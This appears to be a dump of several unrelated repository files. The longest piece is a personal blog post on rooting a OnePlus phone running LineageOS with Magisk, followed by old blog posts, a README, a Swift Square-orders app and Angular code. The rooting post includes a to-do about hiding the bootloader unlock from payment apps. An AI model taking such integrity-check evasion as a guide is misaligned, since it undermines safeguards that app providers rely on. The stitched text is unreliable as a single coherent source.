* Titanium complained that Play store wasn't responding so couldn't check licence key. Fucksake. More lockin.
* Removed key app again.
* Copied one of the old backups across (google authenticator). (An app I had not yet installed on the new phone)
* Fired up titanium, hit restore for that app.
* Boom! There's the app installed, fired it up, worked no problems and now have an (outdated) list of OTPs that I don't use any more. Hollow victory achieved.
## Clock
* Settings
* Time in seconds > on
* Alarms
* silence after > 5 mins
* Snooze length > 15 minutes - I find that if I'm really too tired to move 15 mins makes a good power nap but isn't long enough to be disastrous
* gradually increase
* vol button to snooze
## Config
A complete list
Settings:
* Network and Internet
* Hotspot and Tethering
* Wi-Fi Hotspot
* On
* AP Band
* 5 GHz band preferred
* Bluetooth tethering > On (to give the laptop internet out and about)
* Connected Devices
* Connection preferences
* Bluetooth
* Device name: foo
* Wifi
* Wifi preferences
* Notify for public networks > off
* Apps and Notifications
* Default apps
* SMS app > Signal (actually a great integrated SMS app)
* Notifications
* Advanced
* Do Not Disturb
* People
* Calls > "Contacts and repeat callers"
* Battery
* Battery saver and performance
* Automatic power saver - 15% (off by default oddly)
* Display
* Dark theme
* on
* no schedule - (let's give this a try, we'll see what it's like in broad daylight)
* pure black - on (better for battery and I think it looks cooler)
* Night Light
* Schedule
* sunset till sunrise - this is an experiment, we'll see if it is sensible at it
* Advanced (because this is extreem l33t haxxor stuff, beware n00bs)
* Screen timeout - 5 mins (scary stuff I know, you were warned by the **advanced** thing, I hope you know what you're doing. The nanny phone-state will keep you safe, don't you worry your pretty little head about this section. Twunts.)
* Styles and wallpapers - yes you read that right folks, wallpapers are an "Advanced" feature. What is wrong with this people?
* push a couple of images across to ~/Pictures with syncthing and set them as home & lock screen
* Lock screen
* Add text on lock screen
* `Owner <NAME> <<EMAIL>>` (the idea is that people are generally good and this might be the best way to reach me if I've lost it)
* Tap to sleep - off (I only ever do this by mistake)
* Font size > Largest (I'm getting quite long-sighted)
* Sound
* Vibrate for calls - Always (also has a vibrate then ring which is a nice option)
* Advanced (why??????)
* Phone ringtone - thriller three (there's a great selection & variety available, impressed with Lineage here. Also liked Solarium, Sheep (yes actual sheep), Rigel)
* Default notification sound - Hojus (also liked Beryllium and Titan for minimal stress-inducing feel. Again a great selection available with some really fun sounds).
* Default alarm sound - Piezo Alarm (for the retro kicks. Again more winners in here, well worth exploring)
* Dial pad tones - off
* Screen locking sound - off
* Touch sounds - off
* Privacy
* Show passwords, display characters briefly as you type - off (I just find this annoying/distracting)
* Notifications on lock screen
* Don't show notifications at all - this is more for a clear mind rather than privacy, though that's a bonus. I hate looking at my (locked) phone for the time and getting drawn into the notifications. Happened toooooo many times.
* Trust
* SMS message limit - always confirm (default of 30 seems like a lot of spam to me), might go to 5 if this is a pain
* Security
* Screen lock - pin
* Fingerprint
* System
* Buttons
* Additional buttons
* Slider top - total silence
* Status bar
* Network traffic monitor
* Display mode > upload and download
* Battery status style - Circle (much higher fidelity information)
* Advanced
* Gestures
* Power menu
* Advanced restart - on
* Developer options
* Automatic system updates > off ("Apply updates when device restarts")
* About phone
* Emergency information (wtf is this in about phone for? I had to ddg to find it)
* Add information
* set all the things
* Add contact
* doesn't work, just shows empty list to choose from. dang. TODO
### Legacy phone connectivity
The old phone has Wifi at home but without a sim has no internet out and about. Tether to new phone to give it access to internet elsewhere as needed.
Connected to WiFi hotspot but although it accepted the details it fails to actually connect.
Pair to other phone with bluetooth (either end is fine). On old phone open bluetooth settings, go to device > configure (cog) > Internet access > On.
Success, old phone has internet via bluetooth to new phone just like laptop. Win.
## Todo
* firmware update: <https://wiki.lineageos.org/devices/lemonadep/fw_update>
* Backup/restore with titanium
* better camera support? <https://www.xda-developers.com/google-camera-port-hub/>
* see if android pay etc will work with magisk magic mask pretending we haven't unlocked anything
* find an alternative to titanium backup <https://forum.xda-developers.com/t/farewell-to-titanium-backup-looking-for-alternative.3932814/>
* contribute to lineage to link to golang extractor, maybe with step by step instructions
* Make signal default sms app
* Camera from lock screen
* transfer paid version of rain alarm, seems to be missing three-dot-menu on new version
* Xmeye cctv
* Backup alarms
* Signal SMS warnings -> Settings-privacy-Trust-SMS Sending Limit > 5
* No access to work google cal
* Ignore public wifi
* Maps.me voice. Needs language pack. Wut.
* Remember Bluetooth tethering setting. Needs code change.
* Phone default to Bluetooth
## Problems & bugs
* Phone app
* Fails to unblank when phone rings half the time. Workaround to use power button to sleep/wake a couple of times to wake it up. Painful but bearable.
* Rainalarm problems:
* no menu so can't enable paid copy
* map loads but no rain shown
## OS Updates
<https://wiki.lineageos.org/devices/lemonadep/update>
Watch out for de-rooting, make sure backups are up to date first.
Got the first Over The Air (OTA) (...well, over wifi anyway) update from LineageOS. Download. Install. Reboot. Magisk no longer installed. Well that's a fucking pain. NeoBackup fails to start. Backups now broken. Fuck you android.
todo: see if I can restore root with out a full wipe and reinstall this time. twunts. what a pile of yaks.
* [OnePlus Community forum: Keep Root with Magisk with OTA updates](https://community.oneplus.com/thread?id=914099)
* [piles of fucking yaks courtesy of reddit](https://www.reddit.com/r/LineageOS/comments/hynl52/any_way_to_keep_magisk_and_installed_modules_when/)
* <https://android.stackexchange.com/questions/200410/how-do-i-update-an-ota-while-retaining-twrp-and-magisk-only-with-my-phone>
* <https://topjohnwu.github.io/Magisk/ota.html> -
> "When an OTA is available, first go to (Magisk app → Uninstall → Restore Images). Do not reboot or you will have Magisk uninstalled."
Bit fucking late now.
So basically you have to know all this *before* you let android install an update and fuck up your setup (again). Pit of failure.
Guess I'll have to re-do the patch thing I did in the first place.
Export Antennapod state, backup andOTP and make sure syncthing has pushed the files before attempting anything.
### Re-root attempt - success!
Let's try repeating the magisk setup from the original install but with the updated image.
* Check current version installed
* on phone: settings > about > android version > > lineageos version: lineage-18.1-20220518-microG-lemonadep
* Download matching image to laptop from <https://download.lineage.microg.org/lemonadep/> (if it's still available, which it is. If it wasn't then might have to run more updates or grab image from phone somehow)
* Run the payload extraction, patch on phone & reflash as in original install:
* ` ../../payload-dumper-go/payload-dumper-go_1.2.0_linux_amd64/payload-dumper-go ../lineage-18.1-20220518-microG-lemonadep.zip`
* [plug phone in to laptop with usb]
* `adb push extracted_20220704_232617/boot.img /sdcard/Download/`
* patch the file in magisk on the phone (install > patch > select file etc.)
* get the patched file back on to laptop: `patched=``adb shell ls /sdcard/Download/magisk_patched*`` && echo $patched && adb pull $patched`
* advanced reboot on phone > fastboot
* flash the boot image:
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload2
$ fastboot flash boot magisk_patched-24300_nspcI.img
target reported max download size of 268435456 bytes
sending 'boot_b' (196608 KB)...
OKAY [ 5.675s]
writing 'boot_b'...
OKAY [ 0.644s]
finished. total time: 6.320s
```
* reboot phone ("reboot system now" > power button)
* open up magisk app .... drumroll ....
* success!! "Installed 24.3 (24300)"
... run a backup with neobackup to see if it works... oh never mind it just popped a notification that neobackup has been granted superuser so I guess it can run its backups now and the schedule has kicked it off after a reboot.
### OTA (Over The Air) update without losing root - fail
Having regained root by patching and flashing boot.img again (above) I'm going to try the OTA on-phone patching as per <https://topjohnwu.github.io/Magisk/ota.html>:
* Settings > System > Advanced > Updater
Press refresh symbol in top right corner.
Two images available:
1. LineageOS 19.1, 11 June 2022, 1.3GB > INFO > "Update blocked This update cannot be installed using the updater app. Please read <https://wiki.lineageos.org/devices/lemonadep/upgrade> for more information."
2. LineageOS 18.1, 18 May 2022, 1.1GB > INSTALL > ...
So let's try the point update following [the magisk ota instructions](https://topjohnwu.github.io/Magisk/ota.html)
* Magisk app > Uninstall.... um, where's that then. Perhaps missing because it wasn't installed this way.
* "This will restore partitions modified by Magisk back to stock from backups made at install in order to pass pre-OTA block verifications." - yeah that figures, I didn't do that so there's no backups to restore.
* Guess we'll skip this and hope for the best
* Settings > System > Advanced > Updater > 18.1 18 May 2022 > INSTALL > OK
* ... ~ 10 mins elapse ...
* Updater shows "reboot" button. *DON'T PRESS IT!!*.
* Magisk app > install > install to inactive slot (after OTA) >
* "Attention. Your device will be FORCED to boot to the current inactive slot after a reboot! Only use this option after the OTA is done. Continue?" > OK
* Target slot _a ...
* failed! dammit.
* press little save button top right to save log
Failure log: `magisk_install_log_2022-07-05T21_12_57.log`
```
- Target slot: _a
- Target image: /dev/block/sde16
- Device platform: arm64-v8a
- Installing: 24.3 (24300)
- Unpacking boot image
Parsing boot image: [/dev/block/sde16]
HEADER_VER [3]
KERNEL_SZ [40823296]
RAMDISK_SZ [10201092]
OS_VERSION [11.0.0]
OS_PATCH_LEVEL [2022-05]
PAGESIZE [4096]
CMDLINE []
KERNEL_FMT [raw]
RAMDISK_FMT [gzip]
VBMETA
- Checking ramdisk status
Loading cpio: [ramdisk.cpio]
- Stock boot image detected
- Patching ramdisk
Loading cpio: [ramdisk.cpio]
Add entry [init] (0750)
Create directory [overlay.d] (0750)
Create directory [overlay.d/sbin] (0750)
Add entry [overlay.d/sbin/magisk32.xz] (0644)
Add entry [overlay.d/sbin/magisk64.xz] (0644)
Patch with flag KEEPVERITY=[true] KEEPFORCEENCRYPT=[true]
Loading cpio: [ramdisk.cpio.orig]
Backup mismatch entry: [init] -> [.backup/init]
Record new entry: [overlay.d] -> [.backup/.rmlist]
Record new entry: [overlay.d/sbin] -> [.backup/.rmlist]
Record new entry: [overlay.d/sbin/magisk32.xz] -> [.backup/.rmlist]
Record new entry: [overlay.d/sbin/magisk64.xz] -> [.backup/.rmlist]
Create directory [.backup] (0000)
Add entry [.backup/.magisk] (0000)
Dump cpio: [ramdisk.cpio]
- Repacking boot image
Parsing boot image: [/dev/block/sde16]
HEADER_VER [3]
KERNEL_SZ [40823296]
RAMDISK_SZ [10201092]
OS_VERSION [11.0.0]
OS_PATCH_LEVEL [2022-05]
PAGESIZE [4096]
CMDLINE []
KERNEL_FMT [raw]
RAMDISK_FMT [gzip]
VBMETA
Repack to boot image: [new-boot.img]
HEADER_VER [3]
KERNEL_SZ [40823296]
RAMDISK_SZ [10715780]
OS_VERSION [11.0.0]
OS_PATCH_LEVEL [2022-05]
PAGESIZE [4096]
CMDLINE []
- Flashing new boot image
- Sepolicy rules dir is /dev/hWU/.magisk/mirror/metadata
! Installation failed
! Unable to download bootctl
```
Guess I'll try the patch of boot again.
## Conclusion: inconclusive
The main thing I've learned from this is the long-standing duopoly of iOS+Android has caused deep and hard to reverse problems in the phone software ecosystem. It's a crying shame really because there is so much opportunity for innovation now that phone hardware is basically done, but instead we get stagnation, pointless features, anti-features and down-right user-hostile behaviour from both we-know-best camps. It really reminds me of the dark years of the browser and operating system wars. Particularly when internet explorer became dominant and website (i.e. app) developers targeted proprietary IE APIs, locking everyone in and nearly killing the competition. The same for windows in its prime (when Balmer shouted developers-developers-developers he knew the apps created platform-vendor lock-in that he so desired).
There are some promising signs: Ubuntu so nearly made a phone, and then didn't hit their funding target (the ubuntu phone operating system lives on in obscurity), The Librem looks like it might be a sustainable Linux based phone & business (Android is *not* Linux remember).
For me I think I'll do the closest thing I can to dual-boot and VMs which is to have a second burner phone to run prioprietary crap, but have a primary phone that's as open as I can make it, just like I did with Linux and Windows around 2005-2010.
Every person that takes this route is a vote for change. User numbers matter, especially when it comes to app vendors; they won't invest in dead platforms, but they can't and don't ignore growing market share, and if that's free and open it gets supported. Just look at Microsoft rewriting their *entire* dotnet ecosystem from scratch to be cross platform.
Open source moves slowly, but like an iceberg it's hard to stop when it's claimed the land.
## End... for now
That's as far as I've got so far. I'll be editing this post as I progress with the install so do come and look again. Also suggestions and questions welcome.
I really do hope one day I can de-google my phone just like I de-microsofted my laptop, but today is not that day for me.
## Further reading
* <https://www.howtogeek.com/358166/using-android-without-google-a-kind-of-guide/>
<file_sep>---
title: "message to motorola support"
date: 2003-11-17
slashdot_url: https://slashdot.org/journal/52397/message-to-motorola-support
---
<p>to: <EMAIL><br>subject: support request</p>
<p>Dear Sirs,</p>
<p>I spoke to one of your people on the phone and she recommended I mail details of the three issues I'm having with my new Motorola bluetooth headset.</p>
<p>I own a Sony Ericsson P800<br>(Firmware details: Phone: CXC162002 R2D, Bluetooth: CXC12529 R5A)</p>
<p>I have purchased (yesterday) a Motorola HS810 Bluetooth headset to use with it. (From car phone warehouse)<br>It paired up correctly and I have successfully made & received calls using it.</p>
<p>I am now having difficulty with voice dialling features. When I press the multifunction button on the side of the headset (which does work for answering calls and hanging up) in order to begin a call using voice dialling, the phone picks up the bluetooth connection, but does not then look up any voice commands as it should. I have tested this functionality without the headset and it works as follows: hold down jog dial, speak name, number is dialled.<br>Any ideas?</p>
<p>Probably a separate issue: I don't hear the recorded name that the phone plays when I receive an incoming call from a number which has a voice recording attached (the phone says "playing voice command" but the headset doesn't have sound at that point).</p>
<p>The other thing was: the manual says if you press both volume buttons then the LEDs will stop flashing. But they don't, which is odd.</p>
<p>I look forward to any help you can give me with these queries.</p>
<p>Yours</p>
<p><NAME><br>077** ******</p>
<file_sep>---
title: "tim's technical ramblings"
date: 2005-08-10
slashdot_url: https://slashdot.org/journal/114172/tims-technical-ramblings
---
<p>I'll probably post all technical comments to my space on code project now.</p>
<p><a href="http://www.codeproject.com/script/profile/whos_who.asp?id=1037965">http://www.codeproject.com/script/profile/whos_who.asp?id=1037965</a></p>
<file_sep>---
layout: post
title: Why publish open source when you are commercial?
date: '2014-03-08T19:07:00.000Z'
author: <NAME>
tags:
modified_time: '2014-03-08T19:07:01.451Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5055561057000769363
blogger_orig_url: https://timwise.blogspot.com/2014/03/why-publish-open-source-when-you-are.html
---
Why open source your commercial projects?
* Forces you to decouple them from other internal systems.
* Encourages thinking in terms of reusable modules, which is better for
internal reuse just as much as public reuse.
* Possibility of contributions to systems useful to your business by others.
* Easier reuse within your organisation (the public internet is a better
search and sharing system than any internal systems).
* Reputation advantages, the best coders often like to work in open and
forward-thinking companies, and having public shared code is a great sign
of such an organisation.
Do it early
* Preferably push your very first commit straight to github.
* Do it before it has a chance to be tightly coupled to internal systems,
otherwise you'll have to unpick it and it will be less decoupled from day
one, and inertia might mean that in spite of the best intentions you then
never publish it.
* You'll have it in mind that every commit is public from day one, avoiding
adding internal config etc and forcing you to factor it out into config
which is all round a good thing.
* Don't wait for your code to be perfect, there are compromises in all code
and sharing something imperfect is better than sharing nothing.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/12293521763/in/photostream/"><img
src="https://live.staticflickr.com/3756/12293521763_39d7704c73_k.jpg"
alt="People on the beach with a clifftop"></a>
</div>
Worried about the brand?
* Commit under personal email addresses and push to personal github accounts.
You can always setup a corporate github account later when you are feeling
more confident.
Of course I'm not saying you should open source everything, for example your
core product's codebase should probably not go on github if you are a product
company!
_Be brave, be open._
Props to [<NAME>](https://twitter.com/tomskitomski)
| 5decd41542204a5f73f1485042dfa58c40c491e3 | [
"Markdown",
"HTML",
"Shell"
] | 307 | Markdown | timabell/timwise.co.uk | 7c67b566c352ee11f0e4998a4eac6216c04bfca3 | d3cd55f5f8315c0939ad5f356ddb067a969ee827 |
refs/heads/master | <file_sep>EYEAtos
=======
GUI atos for re-symbolicating Cocoa method calls in crash log.
Developing in very early stage, and you need Xcode 5 to open the .xib file.
### How to use
1. Place __YourApp.app__ and __YourApp.app.dSYM__ in the same directory
2. Launch __EYEAtos__
3. Choose __YourApp.app__
4. Copy & Paste the crash log into __EYEAtos__
5. Press __⌘R__ to re-symbolicate
0. Press __⌘⇧E__ to chose another .app file<file_sep>//
// ATSNotificationDefinitions.h
// atos
//
// Created by eyeplum on 4/20/14.
// Copyright (c) 2014 eyeplum. All rights reserved.
//
#ifndef atos_ATSNotificationDefinitions____FILEEXTENSION___
#define atos_ATSNotificationDefinitions____FILEEXTENSION___
static NSString * const ATSArchiveDidBeSelectedNotification = @"com.eyeplum.atos.archiveSelect";
static NSString * const ATSArchiveFileWrapperKey = @"com.eyeplum.atos.archiveFileWrapper";
static NSString * const ATSMainWindowDidCloseNotification = @"com.eyeplum.atos.mainWindowClose";
#endif
| 1ce49569b975d5e575172b1308e0d920346a787a | [
"Markdown",
"C"
] | 2 | Markdown | Naituw/EYEAtos | 77c4a551a587ca438bc292299045c0343029da49 | 073624b56a49dece9ee142a113c22a14a3f780c2 |
refs/heads/main | <repo_name>sho0120/OrderControlForSquare<file_sep>/Order Control for Square/ViewController.swift
//
// ViewController.swift
// Order Control for Square
//
// Created by 李昌 on 2020/04/23.
// Copyright © 2020 李昌. All rights reserved.
//
import UIKit
import Alamofire
import SwiftyJSON
class ViewController: UIViewController {
//https transition
//test
var parameters: [String: Any] = [
"location_ids": [
"YOUR ID"
],
"query": [
"filter": [
"date_time_filter": [
"created_at": [
"start_at": "2019-11-24T11:30:00+09:00",
"end_at": "2019-11-24T12:00:00+09:00"
]
]
]
]
]
private let headers: HTTPHeaders = [
"Square-Version": "2020-08-26",
"Authorization": "Bearer YOUR TOKEN",
"Content-Type": "application/json"
]
//for updating order
var time: String!
let formatter = ISO8601DateFormatter()
//navigation controller
var addBtn: UIBarButtonItem!
var seeStock: UIBarButtonItem!
//from json responce by alamofire
private var orders: Response?
override func viewDidLoad() {
super.viewDidLoad()
edgesForExtendedLayout = []
self.title = "Home"
//add buttons to navigationbar
addBtn = UIBarButtonItem(title: "スタッフ", style: UIBarButtonItem.Style.plain, target: self, action: #selector(ViewController.editMember))
self.navigationItem.leftBarButtonItem = addBtn
seeStock = UIBarButtonItem(title: "後続のオーダー >", style: UIBarButtonItem.Style.plain, target: self, action: #selector(ViewController.seeOrderStock))
self.navigationItem.rightBarButtonItem = seeStock
self.view.addSubview(self.navigationController!.navigationBar)
self.time = formatter.string(from: Date())
//put buttons
let buttonNumber = 8
let screenSize: CGSize = UIScreen.main.bounds.size
let width = screenSize.width
let height = screenSize.height
let upper = height * 0.05
let lower = height * 0.55
let wideSpace = width * 0.25
let viewHeight = height * 0.4
let viewWidth = width * 0.2
let fromWideSpace = width * 0.025
//self.navigationController?.navigationBar.frame = CGRect(x:0, y:0, width: width, height: 60)
//self.navigationController?.navigationBar.isHidden = false
for i in 0..<buttonNumber{
if(i%2 == 0){
let orderButton = OrderSheet(frame: CGRect(x: wideSpace * CGFloat(Int(i/2)) + fromWideSpace, y: upper, width: viewWidth, height: viewHeight))
self.view.addSubview(orderButton)
}
else{
let orderButton = OrderSheet(frame: CGRect(x: wideSpace * CGFloat(Int(i/2)) + fromWideSpace, y: lower, width: viewWidth, height: viewHeight))
self.view.addSubview(orderButton)
}
}
//alamofire
AF.request("https://connect.squareup.com/v2/orders/search", method: .post, parameters: self.parameters, encoding: JSONEncoding.default, headers: self.headers).responseJSON{res in
guard let json = res.data else{
print("no_json")
return
}
var menues: [String] = []
self.orders = try! JSONDecoder().decode(Response.self, from: json)
if self.orders != nil {
for order in self.orders!.orders{
var menu: String = ""
for i in 0 ..< order.lineItems.count{
menu.append(order.lineItems[i].name)
menu.append(":\t")
menu.append(order.lineItems[i].quantity)
if(i != order.lineItems.count - 1){
menu.append("\n")
}
}
menues.append(menu)
}
OrderSheet.addData(data: menues)
print(OrderSheet.views)
}
else{print("decode failed")}
}
}
//left
@objc func editMember() {
let second = MemberController()
self.navigationController?.pushViewController(second, animated: true)
}
//right
@objc func seeOrderStock() {
let second = OrderStockController()
self.navigationController?.pushViewController(second, animated: true)
}
override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning()
}
}
class OrderSheet: UIView{
var menu: String!
var mainButton: UIButton!
var waveView: UIView!
var status: Int! //-1, 0, or 1
static var views: [OrderSheet] = [] //search button's title
static var orderStock: [String] = [] //input: menues from json data (reformed)
override init(frame: CGRect) {
super.init(frame: frame)
self.mainButton = UIButton()
self.waveView = UIView()
self.waveView.layer.borderWidth = 2.0
self.mainButton.setTitle(self.menu, for: [])
self.mainButton.setTitleColor(UIColor.white, for: [])
self.waveView.layer.cornerRadius = 10
self.waveView.backgroundColor = UIColor.clear
self.mainButton.layer.cornerRadius = 10
self.status = -1
self.mainButton.titleLabel?.numberOfLines = 0
OrderSheet.views.append(self)
}
required init?(coder: NSCoder) {
fatalError("init(coder:) has not been implemented")
}
override func layoutSubviews(){
super.layoutSubviews()
mainButton.frame = self.frame
waveView.frame = CGRect(x: 0, y: 0, width: self.frame.width, height: self.frame.height)
self.addSubview(mainButton)
mainButton.addSubview(waveView)
waveView.isUserInteractionEnabled = false
mainButton.center = waveView.center
self.mainButton.addTarget(self, action: #selector(self.onTap(_:)), for: .touchUpInside)
self.display(status: self.status)
OrderSheet.addData(data: [])
}
func display(status: Int){
switch status {
case 1:
self.mainButton.setTitle(self.menu, for: [])
self.mainButton.backgroundColor = UIColor(red: 0, green: 122 / 255, blue: 1, alpha: 1)
self.waveView.layer.borderColor = UIColor(red: 0, green: 122 / 255, blue: 1, alpha: 0.7).cgColor
//wave motion
UIView.animate(withDuration: 1.5, delay: 0.0, options: [.repeat], animations: {
let affine = CGAffineTransform(a: 1.2, b: 0, c: 0, d: 1.2, tx: 0, ty: 0)
self.waveView.transform = affine
self.waveView.alpha = 0
}, completion: nil)
case 0:
waveView.layer.removeAllAnimations()
let affine = CGAffineTransform(a: 1.0, b: 0, c: 0, d: 1.0, tx: 0, ty: 0)
self.waveView.transform = affine
mainButton.backgroundColor = UIColor(red: 63 / 255, green: 185 / 255, blue: 185 / 255, alpha: 1.0)
//reset waveView
self.waveView.frame = CGRect(x: 0, y: 0, width: self.frame.width, height: self.frame.height)
self.waveView.alpha = 0.7
case -1:
if(OrderSheet.orderStock.isEmpty){
self.menu = nil
self.mainButton.setTitle(self.menu, for: [])
mainButton.backgroundColor = UIColor(red: 185 / 255, green: 185 / 255, blue: 185 / 255, alpha: 1.0)
}
else{
self.menu = OrderSheet.orderStock.first
self.mainButton.setTitle(self.menu, for: [])
OrderSheet.orderStock.removeFirst()
self.status = 1
self.display(status: self.status)
}
default:
print("Invalid Input")
}
}
static func addData(data: [String]){
OrderSheet.orderStock += data
for view in OrderSheet.views{
if(view.menu == nil && (!OrderSheet.orderStock.isEmpty)){
view.menu = OrderSheet.orderStock.first
OrderSheet.orderStock.removeFirst()
view.status = 1
view.display(status: view.status)
}
}
}
//when tapped
@objc func onTap(_ sender: UIButton){
self.status -= 1
display(status: self.status)
}
}
//define json's struct
//encode
/*
struct Parameters{
let locationIds: [String]
let startAt: String
let endAt: String
}
extension Parameters: Encodable {
private struct CustomCodingKey: CodingKey {
var stringValue: String
init?(stringValue: String) {
self.stringValue = stringValue
}
var intValue: Int?
init?(intValue: Int) { return nil }
static let locationIds = CustomCodingKey(stringValue: "location_ids")!
static let query = CustomCodingKey(stringValue: "query")!
static let filter = CustomCodingKey(stringValue: "filter")!
static let dateTimeFilter = CustomCodingKey(stringValue: "date_time_filter")!
static let createdAt = CustomCodingKey(stringValue: "createdAt")!
static let startAt = CustomCodingKey(stringValue: "start_at")!
static let endAt = CustomCodingKey(stringValue: "end_at")!
}
func encode(to encoder: Encoder) throws {
var container = encoder.container(keyedBy: CustomCodingKey.self)
try container.encode(locationIds, forKey: .locationIds)
var queryContainer = container.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .query)
var filterContainer = queryContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .filter)
var dateTimeFilterContainer = filterContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .dateTimeFilter)
var createdAtContainer = dateTimeFilterContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .createdAt)
/*
var startAtContainer = createdAtContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .startAt)
var endAtContainer = createdAtContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .endAt)
*/
try createdAtContainer.encode(startAt, forKey: .startAt)
try createdAtContainer.encode(endAt, forKey: .endAt)
}
}
*/
//decode
struct Response: Decodable{
struct Order: Decodable{
struct LineItem: Decodable{
let quantity: String
let name: String
}
enum CodingKeys: String, CodingKey{
case lineItems = "line_items"
}
let lineItems: [LineItem]
}
let orders: [Order]
}
<file_sep>/Order Control for Square/OrderStockController.swift
//
// OrderStockController.swift
// Order Control for Square
//
// Created by 李昌 on 2020/11/18.
// Copyright © 2020 李昌. All rights reserved.
//
import Foundation
import UIKit
class OrderStockController: UIViewController{
override func viewDidLoad() {
super.viewDidLoad()
self.title = "後続のオーダー"
}
}
<file_sep>/Order Control for Square/MemberController.swift
//
// PreViewController.swift
// Order Control for Square
//
// Created by 李昌 on 2020/11/04.
// Copyright © 2020 李昌. All rights reserved.
//
import Foundation
import UIKit
//function:select, add, delete
class MemberController: UIViewController{
var whoIsInShift: [String] = []
var toolbar: UIToolbar?
override func viewDidLoad() {
super.viewDidLoad()
self.title = "今日のスタッフは?"
let scrollView = UIScrollView()
self.view.addSubview(scrollView)
for staff in self.whoIsInShift{
//let button = staffNameButton(frame: CGRect(x: y: ))
}
}
}
/// A rounded, blue-bordered button that displays a staff member's name.
class staffNameButton: UIButton{
    required init?(coder: NSCoder) {
        // Created in code only; storyboard/nib decoding is not supported.
        fatalError("init(coder:) has not been implemented")
    }
    /// Creates a name button with the given frame and the staff name as its title.
    init(frame: CGRect, name: String) {
        super.init(frame: frame)
        self.setTitle(name, for: [])
        self.layer.cornerRadius = 2.0
        self.setTitleColor(UIColor.white, for: [])
        self.layer.borderWidth = 1.0
        self.layer.borderColor = UIColor.blue.cgColor
    }
    override func layoutSubviews() {
        // Bug fix: the super call was missing. Without it UIButton never
        // lays out its own title/image subviews, so the title cannot render.
        super.layoutSubviews()
        self.titleLabel?.numberOfLines = 1
    }
}
| 335358993736cdf0b0e3a1659d984350a485d5e8 | [
"Swift"
] | 3 | Swift | sho0120/OrderControlForSquare | e55304e77d59b9141216ce82c4be92880b121330 | e47d6fd2bbc6b033f67d509e5ac4c05326783171 |
refs/heads/master | <file_sep>export * from './nav-main.component';<file_sep>import {
Component,
OnInit
} from '@angular/core';
import { ScaffoldService } from '../../../services/scaffold.service' //Import the service. Note that you have to know the path and do NOT include the .ts extension
@Component({
selector: 'scaffolding', // <scaffolding></scaffolding> <-- Include in HTML with this
// We need to tell Angular's Dependency Injection which providers are in our app.
//providers: [],
templateUrl: './scaffolding.component.html'
})
export class ScaffoldingComponent implements OnInit {
user: any = {}
errorLoading: boolean = false
sampleData: any = {first: 'j', last: 'k'};
// TypeScript public modifiers
constructor(
private scaffoldService: ScaffoldService
) { }
public ngOnInit() {
this.scaffoldService.getUserProfile('jkrause').subscribe(
res => this.user = res,
error => this.errorLoading = true
)
}
/**
* Toggle the error message
*/
public showErrorMessage() {
this.errorLoading = !this.errorLoading
}//showErrorMessage
sampleCallback() {
console.log('callback function was called');
}
}
<file_sep>import { Component, OnInit, Input } from '@angular/core';
import { NgbModal, NgbModalOptions } from '@ng-bootstrap/ng-bootstrap';
// import any modal content components
import { SampleModalContentComponent } from '../../modals/sample-modal-content/sample-modal-content.component';
@Component({
  selector: 'button-modal',
  templateUrl: './button-modal.component.html',
  //styleUrls: ['./button-modal.component.css']
})
/**
 * A button that opens a named ng-bootstrap modal when clicked, passes data
 * to the modal's content component, and optionally invokes a callback when
 * the modal is closed (not dismissed).
 */
export class ButtonModalComponent implements OnInit {
  // Map of modal names to the content components they open.
  modalContent = {
    // add modal content components to this map
    sample: SampleModalContentComponent
  };
  /** CSS classes applied to the trigger button. */
  @Input() classes: string = 'btn btn-outline-primary btn-sm';
  /** Key into `modalContent` selecting which component to open. */
  @Input() modalName: string;
  /** ng-bootstrap modal size ('sm' | 'md' | 'lg'). */
  @Input() modalSize: string = "md";
  /** Arbitrary data passed to the modal content component instance. */
  @Input() model: any;
  /** Optional callback invoked after the modal is closed (not dismissed). */
  @Input() callback: Function;

  constructor(private modalService: NgbModal) { }

  ngOnInit() { }

  /** Open the configured modal and handle its close/dismiss result. */
  openModal() {
    const modalToOpen = this.modalContent[this.modalName];
    // store reference to the modal instance
    const modalRef = this.modalService.open(modalToOpen, {backdrop: 'static', size: this.modalSize});
    // add any passed in data to the modal instance
    modalRef.componentInstance.model = this.model;
    // wait for promise that is returned when modal is closed or dismissed
    modalRef.result.then((closeReason) => {
      console.log('modal was closed: ', closeReason);
      // Bug fix: `callback` is an optional @Input; invoking it unconditionally
      // threw a TypeError whenever no callback was bound.
      if (this.callback) {
        this.callback();
      }
    }, (dismissReason) => {
      console.log('modal was dismissed: ', dismissReason);
    });
  }
}<file_sep>export * from './sample-modal-content.component';<file_sep>import { Injectable } from '@angular/core';
import { Http, Response } from '@angular/http';
import { Observable } from 'rxjs/Rx';
import 'rxjs/Rx';
import 'rxjs/add/operator/map';
import 'rxjs/add/operator/share';
import 'rxjs/add/operator/publishReplay';
@Injectable()
/**
 * Service for looking up user (AD) profile data over HTTP.
 * Profile observables are cached per username and replayed to later
 * subscribers, so each user's data is fetched at most once.
 */
export class ScaffoldService {
  // Most recently requested profile observable (kept for backward compatibility
  // with any existing consumers of this public field).
  user : any

  // Cache of profile observables keyed by username. Bug fix: previously a
  // single shared slot (`this.user`) was used for every username, so looking
  // up a second user returned the first user's cached profile.
  private profileCache = new Map<string, any>();

  constructor(
    private http: Http
  ) { }

  /**
   * Get the AD data of the user
   * @param user - username to look up
   * @param update - remove cached version to get new one
   */
  public getUserProfile(user:string, update?:boolean) {
    let url = '/api/Service/getUserProfile/' + user
    // Development stub: serve a static mock payload instead of the live API.
    url = '/app/mock-data/GetUserProfile.json'
    if (update) { this.profileCache.delete(user) }
    if (!this.profileCache.has(user)) {
      this.profileCache.set(user, this.http.get(url)
        .map(res => res.json())
        .publishReplay(1)
        .refCount());
    }
    this.user = this.profileCache.get(user)
    return this.user
  }//end getUserProfile
}
<file_sep>import {
Component,
OnInit
} from '@angular/core';
@Component({
selector: 'home', // <home></home>
// We need to tell Angular's Dependency Injection which providers are in our app.
//providers: [],
// Our list of styles in our component. We may add more to compose many styles together
//styleUrls: ['./header.component.css'],
